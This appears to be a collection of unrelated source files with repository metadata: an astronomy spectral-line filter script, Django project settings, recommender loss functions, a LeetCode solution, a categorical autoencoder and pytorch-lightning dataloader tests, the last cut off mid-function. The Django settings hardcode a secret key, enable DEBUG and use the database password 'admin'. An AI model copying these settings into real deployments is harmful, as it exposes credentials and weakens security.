e0d1ea9356bddae1788184d562b30b0e3e591a0b | 3f726711eeb03efa8bde4045a9af2cd8083e986e | /testchild.py | d4c11b2b531be4e70df5b9c65d6444518ea77136 | [] | no_license | samlsoh/testrepo | f639ebb8e58636c43c0d24914a4f4afd7cd4b364 | 8fa3e0db43c2dc4e0bec3a8828f0765aefcbe87b | refs/heads/main | 2023-04-05T14:51:02.661038 | 2021-04-10T07:46:21 | 2021-04-10T07:46:21 | 356,506,769 | 0 | 0 | null | 2021-04-10T07:46:22 | 2021-04-10T07:29:39 | Python | UTF-8 | Python | false | false | 7 | py | ## ttt
| [
"noreply@github.com"
] | samlsoh.noreply@github.com |
72a39cc7fc3b7cf07381a263be7d4e748952b994 | 97031e553affcc420162bcecc7ec5200cdeeaf8b | /Filter.py | 4b7516383c0f0eff6fdc534a50dd5dba9887cff4 | [] | no_license | Chenoachem/Supercomputer-Scripts | 4728a0d554dceb8419bce33e32bb2fa8ac5b2d6e | d5268048bde1b6ebf39d73cb441153fc9e927946 | refs/heads/master | 2020-03-18T13:57:34.959864 | 2018-05-25T08:59:09 | 2018-05-25T08:59:09 | 134,820,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,704 | py |
import os
import argparse
import numpy as np
import astropy
from astropy.io import fits
import matplotlib
from matplotlib import pyplot as plt
from astropy.coordinates import SkyCoord # High-level coordinates
from astropy.coordinates import ICRS, Galactic, FK4, FK5 # Low-level frames
from astropy.coordinates import Angle, Latitude, Longitude # Angles
import astropy.units as u
from astropy import wcs
import math
import sys

# Usage: Filter.py <cube.fits> <catalog>
# The catalog is a text file with one "ra,dec" pair per line.
mycube = sys.argv[1]
cat_files = sys.argv[2]

# Open the spectral cube once; it is shared by every catalogue source.
datacube = fits.open(mycube)
data = datacube[0].data
header = datacube[0].header

# Set the (2-D, celestial) World Coordinate System up.
w = wcs.WCS(header, naxis=2)

# Build the list of channel frequencies from the FITS spectral axis.
rp = datacube[0].header['CRPIX3']
rf = datacube[0].header['CRVAL3']
df = datacube[0].header['CDELT3']
nf = datacube[0].header['NAXIS3']
xvals = rf + df * (np.arange(nf) - rp)
# Only the first 100 channels are analysed and plotted.
xvals_small = xvals[0:100]

# Number of pixels per beam, from the header beam and pixel sizes.
bmaj = header['BMAJ']
bmin = header['BMIN']
cdelt1 = header['CDELT1']
cdelt2 = header['CDELT2']
beam_pix = math.sqrt((bmaj * bmin) / (-cdelt1 * cdelt2))

# Process each candidate position in the catalogue.  The file is opened
# with a context manager so it is closed afterwards (the original leaked
# the handle and shadowed the name `file`).
with open(cat_files) as catalog:
    for line in catalog:
        ra, dec = line.strip().split(",")
        ra = str(ra)
        dec = str(dec)
        c = SkyCoord(ra, dec, unit=(u.hourangle, u.deg))
        # Convert the world coordinates to pixel coordinates.
        ypix, xpix = c.to_pixel(w, origin=0, mode='wcs')
        # Build a beam-sized box around the potential spectral line.
        # Slice bounds must be integers: float slicing raises in modern
        # numpy (the original computed float bounds).
        xpix1 = int(xpix - (beam_pix / 2))
        xpix2 = int(xpix + (beam_pix / 2))
        ypix1 = int(ypix - (beam_pix / 2))
        ypix2 = int(ypix + (beam_pix / 2))
        # Mean signal inside the box for each of the first 100 channels.
        signal = []
        for x in range(0, 100):
            value = np.nanmean(data[:, x, xpix1:xpix2, ypix1:ypix2])
            signal.append(value)
        signal = np.multiply(signal, 1.13)
        # Peak signal (NaNs treated as 0) and local RMS of the spectrum.
        max_signal = np.nan_to_num(signal)
        max_value = np.amax(max_signal)
        RMS = np.nanstd(signal)
        RMS2 = str(round(RMS, 2))
        # Record positions passing the filter.  Fixed: the original used
        # "AND", which is a SyntaxError in Python; the operator is "and".
        if RMS > 0.5 and max_value / RMS > 5:
            with open('ra_dec_cat', 'a') as f:
                f.write(str(ra) + "," + str(dec) + "\n")
        # Make a spectrum plot for this position.
        # NOTE(review): the original file's indentation was ambiguous; the
        # per-source savefig filename implies the plotting belongs inside
        # the loop -- confirm against the intended workflow.
        bigfig = plt.figure(figsize=(20, 12))
        ax1 = bigfig.add_subplot(111)
        ax1.step(xvals_small / 10**6, signal, color='blue')
        ax1.set_title("Orion Nebula " + str(round(xvals[0] / 10**6, 2)), fontsize=18)
        ax1.set_xlabel("Frequency (MHz)", fontsize=18)
        ax1.set_ylabel("Flux (Jy)", fontsize=18)
        ax1.tick_params(labelsize=15)
        # Second y-axis: the same spectrum expressed as signal-to-noise.
        ax2 = ax1.twinx()
        ax2.step(xvals_small / 10**6, signal / RMS, linewidth=2, color='red')
        ax2.set_ylabel("Signal to Noise Ratio", fontsize=18)
        ax2.tick_params(labelsize=14)
        ax1.text(xvals_small[60] / 10**6, max_value + 4, 'Local RMS=' + str(RMS2), fontsize=18)
        # Align both y-axes on a common set of 7 ticks.
        ax1ylims = ax1.get_ybound()
        ax2ylims = ax2.get_ybound()
        ax1factor = 1 * 6
        ax2factor = 1 * 6
        ax1.set_yticks(np.linspace(ax1ylims[0],
                                   ax1ylims[1] + (ax1factor -
                                                  (ax1ylims[1] + ax1ylims[0]) % ax1factor) %
                                   ax1factor,
                                   7))
        ax2.set_yticks(np.linspace(ax2ylims[0],
                                   ax2ylims[1] + (ax2factor -
                                                  (ax2ylims[1] + ax2ylims[0]) % ax2factor) %
                                   ax2factor,
                                   7))
        bigfig.savefig("Orion_" + str(ra) + "_" + str(round(xvals[0] / 10**6, 0)) + "_.png")
        # Release the figure before the next source so open figures do not
        # accumulate across loop iterations.
        plt.close(bigfig)
| [
"chenoa.tremblay@postgrad.curtin.edu.au"
] | chenoa.tremblay@postgrad.curtin.edu.au |
8a8e93b421403ad32883aba736e8f4d8f304e750 | aa5e3ee6d00f79a97480ea9eaecefe94373e8d21 | /electrify/electrify/settings.py | f10ca6bfaf148e60b4f775be35dfdf38dcb45f6e | [] | no_license | natchu/designAlgo | 8c79c128e64c026aea19c1e3b12a51a769f41732 | 46863bd7e3d0ace3e0afe516b0436603c0c2a349 | refs/heads/master | 2020-04-10T12:07:46.422321 | 2018-12-09T22:43:41 | 2018-12-09T22:43:41 | 161,012,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,219 | py | """
Django settings for electrify project.
Generated by 'django-admin startproject' using Django 1.11.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+hgo@d!4*mo+w@i77u1y(sy*uu04z3udj(*%z=15+fg+i=(9kg'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'electrify'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'electrify.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'electrify.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'electrify',
'USER': 'postgres',
'PASSWORD': 'admin',
'HOST': 'localhost',
'PORT': '5432'
}
}
''
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-nz'
TIME_ZONE = 'NZ'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"natch@Natchus-MacBook-Pro.fritz.box"
] | natch@Natchus-MacBook-Pro.fritz.box |
81c99e05387c044a3ac1267ff206a5f92e342628 | 8eadb61a38ccd0611cb2a3bdbe1a34063ebeab39 | /GRU4REC/modules/loss.py | b9f29357a876cf522a39545482508832353c8f27 | [] | no_license | yw4509/NewRecomendationSystem | 52ab8b3fe59465a32bba4c8312bc4af152c69ef5 | b58b06e70d150de45fff35b311b47085eaf533a1 | refs/heads/master | 2022-04-17T10:45:17.257869 | 2020-04-17T14:49:19 | 2020-04-17T14:49:19 | 256,531,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,348 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
def LossFunction(loss_type):
if loss_type == 'CrossEntropy':
loss_fn = SampledCrossEntropyLoss
elif loss_type == 'TOP1':
loss_fn = TOP1Loss
elif loss_type == 'BPR':
loss_fn = BPRLoss
else:
raise NotImplementedError
return loss_fn
xe_loss = nn.CrossEntropyLoss()
def SampledCrossEntropyLoss(logit):
""" CrossEntropyLoss with n_classes = batch_size = the number of samples in the session-parallel mini-batch """
batch_size = logit.size(1)
target = torch.arange(batch_size).long().to(logit.device)
return xe_loss(logit, target)
def BPRLoss(logit):
"""
Args:
logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
Negative samples for a specific item are drawn from the other items in the
session-parallel minibatch, as mentioned in the original GRU4REC paper.
The first dimension corresponds to the batches, and the second dimension
corresponds to sampled number of items to evaluate.
"""
# differences between the item scores
diff = logit.diag().view(-1, 1).expand_as(logit) - logit
# final loss
loss = -torch.mean(F.logsigmoid(diff))
return loss
def TOP1Loss(logit):
"""
Args:
logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
Negative samples for a specific item are drawn from the other items in the
session-parallel minibatch, as mentioned in the original GRU4REC paper.
The first dimension corresponds to the batches, and the second dimension
corresponds to sampled number of items to evaluate.
"""
# differences between the item scores
diff = -(logit.diag().view(-1, 1).expand_as(logit) - logit)
# final loss
loss = F.sigmoid(diff).mean() + F.sigmoid(logit ** 2).mean()
return loss
# class LossFunction(nn.Module):
# def __init__(self, loss_type='TOP1', use_cuda=True):
# """ An abstract loss function that can supports custom loss functions compatible with PyTorch."""
# super().__init__()
# self.loss_type = loss_type
# self.use_cuda = use_cuda
# if loss_type == 'CrossEntropy':
# self._loss_fn = SampledCrossEntropyLoss(use_cuda)
# elif loss_type == 'TOP1':
# self._loss_fn = TOP1Loss()
# elif loss_type == 'BPR':
# self._loss_fn = BPRLoss()
# else:
# raise NotImplementedError
# class SampledCrossEntropyLoss(nn.Module):
# """ CrossEntropyLoss with n_classes = batch_size = the number of samples in the session-parallel mini-batch """
# def __init__(self, use_cuda):
# """
# See Balazs Hihasi(ICLR 2016), pg.5
# Args:
# use_cuda (bool): whether to use cuda or not
# """
# super().__init__()
# self.xe_loss = nn.CrossEntropyLoss()
# self.use_cuda = use_cuda
# def forward(self, logit):
# batch_size = logit.size(1)
# target = Variable(torch.arange(batch_size).long())
# if self.use_cuda: target = target.cuda()
# return self.xe_loss(logit, target)
# def forward(self, logit):
# return self._loss_fn(logit)
# class BPRLoss(nn.Module):
# def __init__(self):
# """
# See Balazs Hihasi(ICLR 2016), pg.5
# """
# super().__init__()
# def forward(self, logit):
# """
# Args:
# logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
# Negative samples for a specific item are drawn from the other items in the
# session-parallel minibatch, as mentioned in the original GRU4REC paper.
# The first dimension corresponds to the batches, and the second dimension
# corresponds to sampled number of items to evaluate.
# """
# # differences between the item scores
# diff = logit.diag().view(-1, 1).expand_as(logit) - logit
# # final loss
# loss = -torch.mean(F.logsigmoid(diff))
# return loss
# class TOP1Loss(nn.Module):
# def __init__(self):
# """
# See Balazs Hihasi(ICLR 2016), pg.5
# """
# super().__init__()
# def forward(self, logit):
# """
# Args:
# logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
# Negative samples for a specific item are drawn from the other items in the
# session-parallel minibatch, as mentioned in the original GRU4REC paper.
# The first dimension corresponds to the batches, and the second dimension
# corresponds to sampled number of items to evaluate.
# """
# # differences between the item scores
# diff = -(logit.diag().view(-1, 1).expand_as(logit) - logit)
# # final loss
# loss = F.sigmoid(diff).mean() + F.sigmoid(logit ** 2).mean()
# return loss
| [
"yw4509@nyu.edu"
] | yw4509@nyu.edu |
32772c6525955d24f7e8d62c333054bace5d0c9e | 57a55b98af1da63c806b47ff88b468f131b2989b | /03 - August Leetcode Challenge/12 - 119. Pascal's Triangle II.py | c9e37e9793c93d67947aaaf98e63af7e91110e3b | [] | no_license | MedhaNagaraj/Leetcode-Problems | 10545cb118e74dbef9fb5037fb6909f559595e6f | 8973804731b208ebfdd5e37436668c3c15c97f6d | refs/heads/master | 2022-12-18T07:44:12.994756 | 2020-09-17T14:40:28 | 2020-09-17T14:40:28 | 276,165,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | """
119. Pascal's Triangle II
Given a non-negative index k where k ≤ 33, return the kth index row of the Pascal's triangle.
Note that the row index starts from 0.
In Pascal's triangle, each number is the sum of the two numbers directly above it.
Example:
Input: 3
Output: [1,3,3,1]
Follow up:
Could you optimize your algorithm to use only O(k) extra space?
"""
class Solution:
def getRow(self, rowIndex: int) -> List[int]:
# return [1] + [int(str((10**10+1)**k)[-10*(i+1):-10*i]) for i in range(1,k+1)]
return reduce(lambda r,_:[1]+[r[j]+r[j+1] for j in range(len(r)-1)]+[1], range(rowIndex),[1])
| [
"noreply@github.com"
] | MedhaNagaraj.noreply@github.com |
25a07303c5bf387a10234af8fbf3f95ddf57d6a8 | 02a27ec28d9e0b181324e53f4db127baa4acdf81 | /paratus/cat2vec.py | d273a0b3be813f9f2d6b096609c8983a9eae64fb | [] | no_license | jaume-ferrarons/paratus | 886363215c41c8884b0dfc979ad392a604be9001 | 667d55085ff6314e4c12f1e53a9c644276c23d90 | refs/heads/master | 2020-05-30T00:18:18.525748 | 2019-09-22T16:14:35 | 2019-09-22T16:14:35 | 189,456,371 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 923 | py | import numpy as np
import tensorflow as tf
from tensorflow.keras import layers, losses, callbacks, models
from paratus.autoencoder import Autoencoder
class Cat2Vec(Autoencoder):
def _input_layers(self, X):
n_features = X.shape[1]
print("#features: {}".format(n_features))
inputs = []
outputs = []
for i in range(n_features):
size = len(np.unique(X[:, i]))
model = models.Sequential()
model.add(layers.Embedding(size, int(np.ceil(np.log2(size))),
input_length=1,
name="Embedding_{}".format(i)))
model.add(layers.Flatten())
inputs.append(model.input)
outputs.append(model.output)
return inputs, outputs
def _format_input(self, X):
n_features = X.shape[1]
return [X[:, i] for i in range(n_features)]
| [
"ckroxigor@gmail.com"
] | ckroxigor@gmail.com |
cbc5f4ee8235f55c75f0cbc46d9e3ff8540ec936 | 0db794cd38729871ae4a431e4d3261d194addb22 | /tests/trainer/test_dataloaders.py | 1c7e21b7a72bb557d57ac83bec57b3b99f66d79d | [
"Apache-2.0"
] | permissive | scarecrow1123/pytorch-lightning | 465acd306c6f0d9f6c6dc1b76deb2b648f08aa60 | 66aa5270daf92813f3b1717513d1915ac6637fb4 | refs/heads/master | 2022-11-30T18:09:03.584325 | 2020-08-09T18:06:56 | 2020-08-09T18:06:56 | 285,723,364 | 0 | 0 | Apache-2.0 | 2020-08-07T03:00:11 | 2020-08-07T03:00:10 | null | UTF-8 | Python | false | false | 28,928 | py | import os
import platform
from unittest.mock import patch
import pytest
import torch
from packaging.version import parse
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.dataset import IterableDataset, Subset
from torch.utils.data.distributed import DistributedSampler
import tests.base.develop_pipelines as tpipes
from pytorch_lightning import Trainer, Callback
from pytorch_lightning.trainer.data_loading import _has_iterable_dataset, _has_len
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.base import EvalModelTemplate
def test_fit_train_loader_only(tmpdir):
    """Ensure ``fit()`` runs when only a train dataloader is supplied."""
    model = EvalModelTemplate()
    loader = model.train_dataloader()

    # strip every dataloader/eval hook so only the explicitly passed loader is used
    for hook in ('train_dataloader', 'val_dataloader', 'test_dataloader',
                 'validation_step', 'validation_epoch_end',
                 'test_step', 'test_epoch_end'):
        setattr(model, hook, None)

    trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir)
    trainer.fit(model, train_dataloader=loader)
def test_fit_val_loader_only(tmpdir):
    """Ensure ``fit()`` runs with train and val dataloaders passed explicitly."""
    model = EvalModelTemplate()
    train_loader = model.train_dataloader()
    val_loader = model.val_dataloader()

    # remove the dataloader hooks and the test-stage hooks; val hooks stay
    for hook in ('train_dataloader', 'val_dataloader', 'test_dataloader',
                 'test_step', 'test_epoch_end'):
        setattr(model, hook, None)

    trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir)
    trainer.fit(model, train_dataloader=train_loader, val_dataloaders=val_loader)
@pytest.mark.parametrize("dataloader_options", [
    dict(val_check_interval=1.1),
    dict(val_check_interval=10000),
])
def test_dataloader_config_errors_runtime(tmpdir, dataloader_options):
    """An out-of-range ``val_check_interval`` must raise once ``fit`` starts."""
    model = EvalModelTemplate()
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, **dataloader_options)

    # the invalid interval is only validated against the dataloader at fit time
    with pytest.raises(ValueError):
        trainer.fit(model)
@pytest.mark.parametrize("dataloader_options", [
    dict(limit_train_batches=-0.1),
    dict(limit_train_batches=1.2),
    dict(limit_val_batches=-0.1),
    dict(limit_val_batches=1.2),
    dict(limit_test_batches=-0.1),
    dict(limit_test_batches=1.2),
])
def test_dataloader_config_errors_init(tmpdir, dataloader_options):
    """Batch-limit fractions outside [0, 1] must raise at Trainer construction."""
    with pytest.raises(MisconfigurationException):
        Trainer(default_root_dir=tmpdir, max_epochs=1, **dataloader_options)
def test_multiple_val_dataloader(tmpdir):
    """A model returning two val dataloaders must register and evaluate both."""
    model = EvalModelTemplate()
    model.val_dataloader = model.val_dataloader__multiple
    model.validation_step = model.validation_step__multiple_dataloaders
    model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders

    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=1.0,
    )
    result = trainer.fit(model)

    # training finished and both loaders were picked up by the trainer
    assert result == 1
    assert len(trainer.val_dataloaders) == 2, \
        'Multiple val_dataloaders not initiated properly'

    # sanity-check predictions against each validation split
    for loader in trainer.val_dataloaders:
        tpipes.run_prediction(loader, trainer.model)
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_multiple_test_dataloader(tmpdir, ckpt_path):
    """A model exposing two test dataloaders must register and evaluate both."""
    base_model = EvalModelTemplate()

    class MultipleTestDataloaderModel(EvalModelTemplate):
        # delegate to the template's multi-loader variants
        def test_dataloader(self):
            return base_model.test_dataloader__multiple()

        def test_step(self, batch, batch_idx, *args, **kwargs):
            return base_model.test_step__multiple_dataloaders(batch, batch_idx, *args, **kwargs)

    model = MultipleTestDataloaderModel()

    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )
    trainer.fit(model)
    if ckpt_path == 'specific':
        ckpt_path = trainer.checkpoint_callback.best_model_path
    trainer.test(ckpt_path=ckpt_path)

    assert len(trainer.test_dataloaders) == 2, \
        'Multiple test_dataloaders not initiated properly'

    # make sure predictions are good for each test split
    for loader in trainer.test_dataloaders:
        tpipes.run_prediction(loader, trainer.model)

    # run the test method a second time
    trainer.test(ckpt_path=ckpt_path)
def test_train_dataloader_passed_to_fit(tmpdir):
    """A train dataloader supplied directly to ``fit`` must be accepted."""
    model = EvalModelTemplate()
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )
    result = trainer.fit(model, train_dataloader=model.dataloader(train=True))
    assert result == 1
def test_train_val_dataloaders_passed_to_fit(tmpdir):
    """Train and val dataloaders supplied directly to ``fit`` must be accepted."""
    model = EvalModelTemplate()
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )
    result = trainer.fit(
        model,
        train_dataloader=model.dataloader(train=True),
        val_dataloaders=model.dataloader(train=False),
    )

    assert result == 1
    assert len(trainer.val_dataloaders) == 1, \
        f'`val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_all_dataloaders_passed_to_fit(tmpdir, ckpt_path):
    """Train/val loaders passed to ``fit`` and a test loader to ``test`` must all register."""
    model = EvalModelTemplate()

    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )
    result = trainer.fit(
        model,
        train_dataloader=model.dataloader(train=True),
        val_dataloaders=model.dataloader(train=False),
    )
    if ckpt_path == 'specific':
        ckpt_path = trainer.checkpoint_callback.best_model_path
    trainer.test(test_dataloaders=model.dataloader(train=False), ckpt_path=ckpt_path)

    assert result == 1
    assert len(trainer.val_dataloaders) == 1, \
        f'val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
    assert len(trainer.test_dataloaders) == 1, \
        f'test_dataloaders` not initiated properly, got {trainer.test_dataloaders}'
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_multiple_dataloaders_passed_to_fit(tmpdir, ckpt_path):
    """Lists of val and test dataloaders passed explicitly must all register."""
    model = EvalModelTemplate()
    model.validation_step = model.validation_step__multiple_dataloaders
    model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
    model.test_step = model.test_step__multiple_dataloaders

    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )
    trainer.fit(
        model,
        train_dataloader=model.dataloader(train=True),
        val_dataloaders=[model.dataloader(train=False), model.dataloader(train=False)],
    )
    if ckpt_path == 'specific':
        ckpt_path = trainer.checkpoint_callback.best_model_path
    trainer.test(
        test_dataloaders=[model.dataloader(train=False), model.dataloader(train=False)],
        ckpt_path=ckpt_path,
    )

    assert len(trainer.val_dataloaders) == 2, \
        f'Multiple `val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
    assert len(trainer.test_dataloaders) == 2, \
        f'Multiple `test_dataloaders` not initiated properly, got {trainer.test_dataloaders}'
@pytest.mark.parametrize(
    ['limit_train_batches', 'limit_val_batches', 'limit_test_batches'],
    [
        pytest.param(0.0, 0.0, 0.0),
        pytest.param(0, 0, 0.5),
        pytest.param(1.0, 1.0, 1.0),
        pytest.param(0.2, 0.4, 0.4),
    ]
)
def test_dataloaders_with_limit_percent_batches(tmpdir, limit_train_batches, limit_val_batches, limit_test_batches):
    """Verify num_batches for val & test dataloaders passed with batch limit in percent"""
    model = EvalModelTemplate()
    # use multiple val/test loaders of different lengths so the per-loader
    # fractional limit is exercised independently for each loader
    model.val_dataloader = model.val_dataloader__multiple_mixed_length
    model.test_dataloader = model.test_dataloader__multiple_mixed_length
    model.validation_step = model.validation_step__multiple_dataloaders
    model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
    model.test_step = model.test_step__multiple_dataloaders
    model.test_epoch_end = model.test_epoch_end__multiple_dataloaders
    # train, multiple val and multiple test passed with percent_check
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_train_batches=limit_train_batches,
        limit_val_batches=limit_val_batches,
        limit_test_batches=limit_test_batches,
    )
    trainer.fit(model)
    # a fractional limit scales each loader's own length, truncated to int
    expected_train_batches = int(len(trainer.train_dataloader) * limit_train_batches)
    expected_val_batches = [
        int(len(dataloader) * limit_val_batches) for dataloader in trainer.val_dataloaders
    ]
    assert trainer.num_training_batches == expected_train_batches
    # num_val_batches is a list: one entry per val dataloader
    assert trainer.num_val_batches == expected_val_batches
    trainer.test(ckpt_path=None)
    expected_test_batches = [
        int(len(dataloader) * limit_test_batches) for dataloader in trainer.test_dataloaders
    ]
    assert trainer.num_test_batches == expected_test_batches
@pytest.mark.parametrize(
    ['limit_train_batches', 'limit_val_batches', 'limit_test_batches'],
    [
        pytest.param(0, 0, 0),
        pytest.param(1, 2, 3),
        pytest.param(1, 2, 1e50),
    ]
)
def test_dataloaders_with_limit_num_batches(tmpdir, limit_train_batches, limit_val_batches, limit_test_batches):
    """Verify num_batches for val & test dataloaders passed with batch limit as number"""
    # enable the dev debugger so the number of batches actually seen per
    # dataloader is recorded and can be asserted on afterwards
    os.environ['PL_DEV_DEBUG'] = '1'
    model = EvalModelTemplate()
    # multiple val/test loaders of different lengths exercise the per-loader limit
    model.val_dataloader = model.val_dataloader__multiple_mixed_length
    model.test_dataloader = model.test_dataloader__multiple_mixed_length
    model.validation_step = model.validation_step__multiple_dataloaders
    model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
    model.test_step = model.test_step__multiple_dataloaders
    model.test_epoch_end = model.test_epoch_end__multiple_dataloaders
    # train, multiple val and multiple test passed with percent_check
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_train_batches=limit_train_batches,
        limit_val_batches=limit_val_batches,
        limit_test_batches=limit_test_batches,
    )
    trainer.fit(model)
    # -------------------------------------------
    # MAKE SURE THE TRAINER SET THE CORRECT VALUES
    # -------------------------------------------
    assert trainer.num_training_batches == limit_train_batches
    assert trainer.num_val_batches == [limit_val_batches] * len(trainer.val_dataloaders)
    trainer.test(ckpt_path=None)
    # when the limit is greater than the number of test batches it should be the num in loaders
    test_dataloader_lengths = [len(x) for x in model.test_dataloader()]
    if limit_test_batches > 1e10:
        # limit is effectively infinite: trainer falls back to the real lengths
        assert trainer.num_test_batches == test_dataloader_lengths
    else:
        assert trainer.num_test_batches == [limit_test_batches] * len(trainer.test_dataloaders)
    # -------------------------------------------
    # make sure we actually saw the expected num of batches
    # -------------------------------------------
    num_val_dataloaders = len(model.val_dataloader())
    num_test_dataloaders = len(model.test_dataloader())
    if limit_train_batches > 0:
        # make sure val batches are as expected (dev debugger records one
        # entry per dataloader index)
        assert len(trainer.dev_debugger.num_seen_val_check_batches) == num_val_dataloaders
        for dataloader_idx, num_batches in trainer.dev_debugger.num_seen_val_check_batches.items():
            assert num_batches == limit_val_batches
        # make sure test batches are as expected
        assert len(trainer.dev_debugger.num_seen_test_check_batches) == num_test_dataloaders
        for dataloader_idx, num_batches in trainer.dev_debugger.num_seen_test_check_batches.items():
            if limit_test_batches > 1e10:
                # uncapped: each loader runs its full length
                assert num_batches == test_dataloader_lengths[dataloader_idx]
            else:
                assert num_batches == limit_test_batches
def test_dataloaders_with_fast_dev_run(tmpdir):
    """Verify num_batches for train, val & test dataloaders passed with fast_dev_run = True"""
    # dev debugger records sanity-check batch counts for the final assertion
    os.environ['PL_DEV_DEBUG'] = '1'
    model = EvalModelTemplate()
    # multiple val/test loaders verify fast_dev_run caps every loader at 1 batch
    model.val_dataloader = model.val_dataloader__multiple_mixed_length
    model.test_dataloader = model.test_dataloader__multiple_mixed_length
    model.validation_step = model.validation_step__multiple_dataloaders
    model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
    model.test_step = model.test_step__multiple_dataloaders
    model.test_epoch_end = model.test_epoch_end__multiple_dataloaders
    # train, multiple val and multiple test dataloaders passed with fast_dev_run = True
    trainer = Trainer(
        default_root_dir=tmpdir,
        max_epochs=2,
        fast_dev_run=True,
    )
    # fast_dev_run forces a single epoch and skips the sanity check
    assert trainer.max_epochs == 1
    assert trainer.num_sanity_val_steps == 0
    trainer.fit(model)
    # validation still runs, but every loader is limited to a single batch
    assert not trainer.disable_validation
    assert trainer.num_training_batches == 1
    assert trainer.num_val_batches == [1] * len(trainer.val_dataloaders)
    trainer.test(ckpt_path=None)
    assert trainer.num_test_batches == [1] * len(trainer.test_dataloaders)
    # verify sanity check batches match as expected
    num_val_dataloaders = len(model.val_dataloader())
    assert trainer.dev_debugger.num_seen_sanity_check_batches == trainer.num_sanity_val_steps * num_val_dataloaders
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_mixing_of_dataloader_options(tmpdir, ckpt_path):
    """Dataloaders may be mixed: model-defined train loader with fit/test-time val/test loaders."""
    model = EvalModelTemplate()
    trainer_kwargs = dict(
        default_root_dir=tmpdir,
        max_epochs=1,
        limit_val_batches=0.1,
        limit_train_batches=0.2,
    )

    # first run: only the val loader is supplied at fit time
    trainer = Trainer(**trainer_kwargs)
    assert trainer.fit(model, val_dataloaders=model.dataloader(train=False))

    # second run with a fresh trainer, followed by test with an explicit loader
    trainer = Trainer(**trainer_kwargs)
    assert trainer.fit(model, val_dataloaders=model.dataloader(train=False))
    if ckpt_path == 'specific':
        ckpt_path = trainer.checkpoint_callback.best_model_path
